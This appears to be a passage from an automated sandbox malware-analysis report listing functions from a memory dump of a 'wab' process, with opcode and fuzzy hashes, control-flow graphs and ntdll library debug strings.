                                          • Opcode Fuzzy Hash: 711f1cfbf95890ff563051e94e6b77c33b1c22f19c0d2fc3cc89a437f21193f9
                                          • Instruction Fuzzy Hash: 0C90027125540403D2507158444474610055BD1305F56C012A51A5534E8759CED56665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702E80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a170a238603cc980e578c54cdef6645ff8776afaf261d4f16f46d3a48564609c
                                          • Instruction ID: e62d7797889c9b14290038477c7db3f80aa3145f74eda38571da4cd45c5ed532
                                          • Opcode Fuzzy Hash: a170a238603cc980e578c54cdef6645ff8776afaf261d4f16f46d3a48564609c
                                          • Instruction Fuzzy Hash: EE90022165540503D21171584444616100A5BD1245F96C023A1165535ECB25CA92A131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702F60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ac29425be2050e404585cdb7979f6051e2c08589d859d330eb56a43a4b0c74f
                                          • Instruction ID: 062cdc5d3c19d2c4fed10847ccf064bac7cbc5f30ade723d5ed902710f715ceb
                                          • Opcode Fuzzy Hash: 1ac29425be2050e404585cdb7979f6051e2c08589d859d330eb56a43a4b0c74f
                                          • Instruction Fuzzy Hash: 7590026126540043D2147158444470610455BE2205F56C013A2295534CC629CD615125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15f6ef280c4278d02be40e949e9547cc40942fdf27a2762344854ed46bcf74c3
                                          • Instruction ID: 2ea3db12f0cf603fe211046b0c03a508737d9f24d3fa058b3dc5ee4a9daabded
                                          • Opcode Fuzzy Hash: 15f6ef280c4278d02be40e949e9547cc40942fdf27a2762344854ed46bcf74c3
                                          • Instruction Fuzzy Hash: EC90026139540443D21071584454B0610059BE2305F56C016E11A5534D8719CD526126
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702FE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: deef57c2e9e226e903bc9b8ac96cd52fee7f6411fb58b4a69c0f1b3718f6d287
                                          • Instruction ID: d9dc585e6263c175785ac75bd1f083035133a3ef2db5b5e51ba629457b435a9c
                                          • Opcode Fuzzy Hash: deef57c2e9e226e903bc9b8ac96cd52fee7f6411fb58b4a69c0f1b3718f6d287
                                          • Instruction Fuzzy Hash: 93900221265C0043D31075684C54B0710055BD1307F56C116A0295534CCA15C9615521
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702FB0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff23ebede6eccce02edf4f983b3e7b1593ef5356ab335e5761e5413b83c29bf9
                                          • Instruction ID: 062ad0049784f20aaf00589528a0b128cef11e0b8382df5e229c99666b6b9550
                                          • Opcode Fuzzy Hash: ff23ebede6eccce02edf4f983b3e7b1593ef5356ab335e5761e5413b83c29bf9
                                          • Instruction Fuzzy Hash: 3A9002216554004342507168888490650057FE2215756C122A0AD9530D8659C9655665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702FA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1271aaab8b06ac47926fa7fde93e87b88809c5b430d2ca1be446609efe5d365
                                          • Instruction ID: 39ae0a36b8151d33b1f1eefc15a0e872fb0d1e89a44bfbd682eebd3d6075a5c5
                                          • Opcode Fuzzy Hash: a1271aaab8b06ac47926fa7fde93e87b88809c5b430d2ca1be446609efe5d365
                                          • Instruction Fuzzy Hash: 6890023125580403D2107158484874710055BD1306F56C012A52A5535E8765C9916531
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702F90 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27306e19d8539c6cb3e6c801ab33a7cee375ec4d661eb26b0525851cc6cbfb97
                                          • Instruction ID: fd5cacfafbf2824d310dcd52ce8d582eee159d8abe28a0916a6f500cd238ce28
                                          • Opcode Fuzzy Hash: 27306e19d8539c6cb3e6c801ab33a7cee375ec4d661eb26b0525851cc6cbfb97
                                          • Instruction Fuzzy Hash: 7F90023125580403D2107158485470B10055BD1306F56C012A12A5535D8725C9516571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 247039B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 69c40e825f8500679749416eae828a58d8d046fb81d0261be806227ba1e06cba
                                          • Instruction ID: 0c1b4618b86cb676e3ea2bd7022956afee798f1d6e143195dc2826112814753a
                                          • Opcode Fuzzy Hash: 69c40e825f8500679749416eae828a58d8d046fb81d0261be806227ba1e06cba
                                          • Instruction Fuzzy Hash: 7390022129945103D260715C444461650057BE1205F56C022A0955574D8655C9556221
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702AF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89d0433520e79fcf1502114836aa8ff339c0557ae1ea03f04fb92046cc167758
                                          • Instruction ID: 2048c4947ad9783dfa215e42ebe01e50069e7b608913645dc42e082b338494b3
                                          • Opcode Fuzzy Hash: 89d0433520e79fcf1502114836aa8ff339c0557ae1ea03f04fb92046cc167758
                                          • Instruction Fuzzy Hash: F7900225275400030255B558064450B14456BD7355396C016F1557570CC721C9655321
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702AD0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9af233a5903263fc2d92e55b276701e050620073433380e8f1eb83fbf727b517
                                          • Instruction ID: 5859a878fecddf69c4a6eca4a3a77b9115a608558f60df7d171f7f912df880f7
                                          • Opcode Fuzzy Hash: 9af233a5903263fc2d92e55b276701e050620073433380e8f1eb83fbf727b517
                                          • Instruction Fuzzy Hash: 49900225265400030215B558074450710465BD6355356C022F1156530CD721C9615121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 609303d18f898328066f59c03e5d8e300da2f1ceb6915ca71ac08a070cd8fc4b
                                          • Instruction ID: 6544e26a079f1a87b301ac1961ddf24d29cb20772c6fe7b8c72079f55d0d20ae
                                          • Opcode Fuzzy Hash: 609303d18f898328066f59c03e5d8e300da2f1ceb6915ca71ac08a070cd8fc4b
                                          • Instruction Fuzzy Hash: AD9002A1255540934610B2588444B0A55055BE1205B56C017E1195530CC625C9519135
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43608700a8a59891a7ed1546b77472866a2b4cba3bebecbc72d08e154baae718
                                          • Instruction ID: 66768b350a10515c7da7ac512a2a021f3b8c0962377375f8faf4b2194b8b5dfc
                                          • Opcode Fuzzy Hash: 43608700a8a59891a7ed1546b77472866a2b4cba3bebecbc72d08e154baae718
                                          • Instruction Fuzzy Hash: 4D90026125640003421571584454616500A5BE1205B56C022E1155570DC625C9916125
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f5f57e26d2ce337de4034f351738e9a5c857e6c9024f9234f809e066c2e057b
                                          • Instruction ID: 59c7ec8c93d802baac8eaa70a65cda4b694734b21624f875261770ded7b3c961
                                          • Opcode Fuzzy Hash: 7f5f57e26d2ce337de4034f351738e9a5c857e6c9024f9234f809e066c2e057b
                                          • Instruction Fuzzy Hash: 1190023125540803D2907158444464A10055BD2305F96C016A0166634DCB15CB5977A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702BE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa572da5f2a66039f2d11129d23a312c3258417f55b66d97552cf78a7b202dae
                                          • Instruction ID: ff94dee8e3e38168a2e26120da7b9c0855b92946d9456fc4f2b746fd8ba1743a
                                          • Opcode Fuzzy Hash: aa572da5f2a66039f2d11129d23a312c3258417f55b66d97552cf78a7b202dae
                                          • Instruction Fuzzy Hash: B390023125944843D25071584444A4610155BD1309F56C012A01A5674D9725CE55B661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702BA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d96d5e21b6198706a5b1c9848d8e4435032aeb563382f1611e82a5c3b6f137ed
                                          • Instruction ID: ca5134a9b18b246bfccfdbb068a6f13e9f6aeb2ff91d6297b2e43b699b79d3cd
                                          • Opcode Fuzzy Hash: d96d5e21b6198706a5b1c9848d8e4435032aeb563382f1611e82a5c3b6f137ed
                                          • Instruction Fuzzy Hash: E390023165940803D2607158445474610055BD1305F56C012A0165634D8755CB5576A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702B80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: acc6c5b78d99efd5b7fe8d2469f60aceaf70aef53e4f313a6eed025da29b180f
                                          • Instruction ID: 5924801b2e4c77d1422bddb760233f4593260fd5fcbe89ee990808c6f348e0fa
                                          • Opcode Fuzzy Hash: acc6c5b78d99efd5b7fe8d2469f60aceaf70aef53e4f313a6eed025da29b180f
                                          • Instruction Fuzzy Hash: 1E90023125540803D2147158484468610055BD1305F56C012A6165635E9765C9917131
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 24300fbd5c8e0c4a8d266cbb40bd8ac581b0c15bace43f2938f6402a4e1f10a0
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 680 24702890-247028b3 681 247028b9-247028cc 680->681 682 2473a4bc-2473a4c0 680->682 684 247028dd-247028df 681->684 685 247028ce-247028d7 681->685 682->681 683 2473a4c6-2473a4ca 682->683 683->681 686 2473a4d0-2473a4d4 683->686 688 247028e1-247028e5 684->688 685->684 687 2473a57e-2473a585 685->687 686->681 689 2473a4da-2473a4de 686->689 687->684 690 24702988-2470298e 688->690 691 247028eb-247028fa 688->691 689->681 695 2473a4e4-2473a4eb 689->695 694 24702908-2470290c 690->694 692 24702900-24702905 691->692 693 2473a58a-2473a58d 691->693 692->694 693->694 694->688 696 2470290e-2470291b 694->696 697 2473a564-2473a56c 695->697 698 2473a4ed-2473a4f4 695->698 699 2473a592-2473a599 696->699 700 24702921 696->700 697->681 701 2473a572-2473a576 697->701 702 2473a4f6-2473a4fe 698->702 703 2473a50b 698->703 712 2473a5a1-2473a5c9 call 24710050 699->712 704 24702924-24702926 700->704 701->681 705 2473a57c call 24710050 701->705 702->681 706 2473a504-2473a509 702->706 707 2473a510-2473a536 call 24710050 703->707 709 24702993-24702995 704->709 710 24702928-2470292a 704->710 719 2473a55d-2473a55f 705->719 706->707 707->719 709->710 714 24702997-247029b1 call 24710050 709->714 716 24702946-24702966 call 24710050 710->716 717 2470292c-2470292e 710->717 729 24702969-24702974 714->729 716->729 717->716 722 24702930-24702944 call 24710050 717->722 726 24702981-24702985 719->726 722->716 729->704 731 24702976-24702979 729->731 731->712 732 2470297f 731->732 732->726
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 876450d983b1d690090fc38f82888c4f41ca45dc8a5df30e473d12a8f53f573a
                                          • Instruction ID: d59c42e3e88a7ce1b492ea6259db033eab61a4efd2c63d8d89b12406d1950fdd
                                          • Opcode Fuzzy Hash: 876450d983b1d690090fc38f82888c4f41ca45dc8a5df30e473d12a8f53f573a
                                          • Instruction Fuzzy Hash: 7051F9B7A00156BFCB11DFA9C89497EFBF8BB18200750D169E5B8E7746D274DE408BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 937 246f7630-246f7651 938 246f768b-246f7699 call 24704c30 937->938 939 246f7653-246f766f call 246ce660 937->939 944 246f7675-246f7682 939->944 945 24734638 939->945 946 246f769a-246f76a9 call 246f7818 944->946 947 246f7684 944->947 949 2473463f-24734645 945->949 953 246f76ab-246f76c1 call 246f77cd 946->953 954 246f7701-246f770a 946->954 947->938 951 246f76c7-246f76d0 call 246f7728 949->951 952 2473464b-247346b8 call 2474f290 call 24709020 BaseQueryModuleData 949->952 951->954 962 246f76d2 951->962 952->951 975 247346be-247346c6 952->975 953->949 953->951 957 246f76d8-246f76e1 954->957 964 246f770c-246f770e 957->964 965 246f76e3-246f76f2 call 246f771b 957->965 962->957 966 246f76f4-246f76f6 964->966 965->966 969 246f76f8-246f76fa 966->969 970 246f7710-246f7719 966->970 969->947 972 246f76fc 969->972 970->969 974 247347be-247347d0 call 24702c50 972->974 974->947 975->951 976 247346cc-247346d3 975->976 976->951 978 247346d9-247346e4 976->978 980 247346ea-24734723 call 2474f290 call 2470aaa0 978->980 981 247347b9 call 24704d48 978->981 987 24734725-24734736 call 2474f290 980->987 988 2473473b-2473476b call 2474f290 980->988 981->974 987->954 988->951 993 24734771-2473477f call 2470a770 988->993 996 24734781-24734783 993->996 997 24734786-247347a3 call 2474f290 call 2473cf9e 993->997 996->997 997->951 1002 247347a9-247347b2 997->1002 1002->993 1003 247347b4 1002->1003 1003->951
                                          Strings
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 24734655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 24734787
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 24734725
                                          • ExecuteOptions, xrefs: 247346A0
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 247346FC
                                          • Execute=1, xrefs: 24734713
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 24734742
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: 7e20a7798760e02c2db786015514bc1c9965bd247a7c07240ea72e86babbd32b
                                          • Instruction ID: 0141c25062f2a7f275c4c35d02210f0131e59d60b61bd0d51cdf3e2b750cf377
                                          • Opcode Fuzzy Hash: 7e20a7798760e02c2db786015514bc1c9965bd247a7c07240ea72e86babbd32b
                                          • Instruction Fuzzy Hash: F3514B31700A197BEF15ABA4DC99FED77B8EF28302F0100E9E616A7281E7719E418F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2470B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: f3e1c33bb5d0abbbafe2c4aa97d9507edb3bbb5e56ed01d4d14eb8af51458515
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: E281CF70E072498EDB158FE8C890BEEBBF5AF85350F14E65AD870A73D1E7309A408B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

